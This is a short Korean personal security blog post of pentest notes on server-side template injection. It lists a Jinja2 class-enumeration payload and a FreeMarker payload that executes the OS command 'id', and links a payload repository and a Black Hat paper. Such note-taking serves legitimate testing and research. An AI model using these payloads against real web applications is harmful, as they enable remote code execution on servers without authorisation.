'2022/09/28'에 해당되는 글 1건

SSTI

경로 및 정보 2022. 9. 28. 07:30 
{{config.__class__.__base__.__subclasses__()}}

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2

 

 

GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

A list of useful payloads and bypass for Web Application Security and Pentest/CTF - GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and ...

github.com

 

https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

 

'경로 및 정보' 카테고리의 다른 글

jenkins RCE  (0) 2022.10.07
Cisco Smart Install Client 취약점  (0) 2022.10.06
jinja2-ssti-filter-bypasses  (0) 2022.09.27
[ IIS ] http header 에 server 정보  (0) 2022.09.21
쇼단 문자열 검색 건  (1) 2022.09.20
블로그 이미지

wtdsoul

,

공지사항

태그목록

글 보관함

달력

«   2022/09   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30

티스토리툴바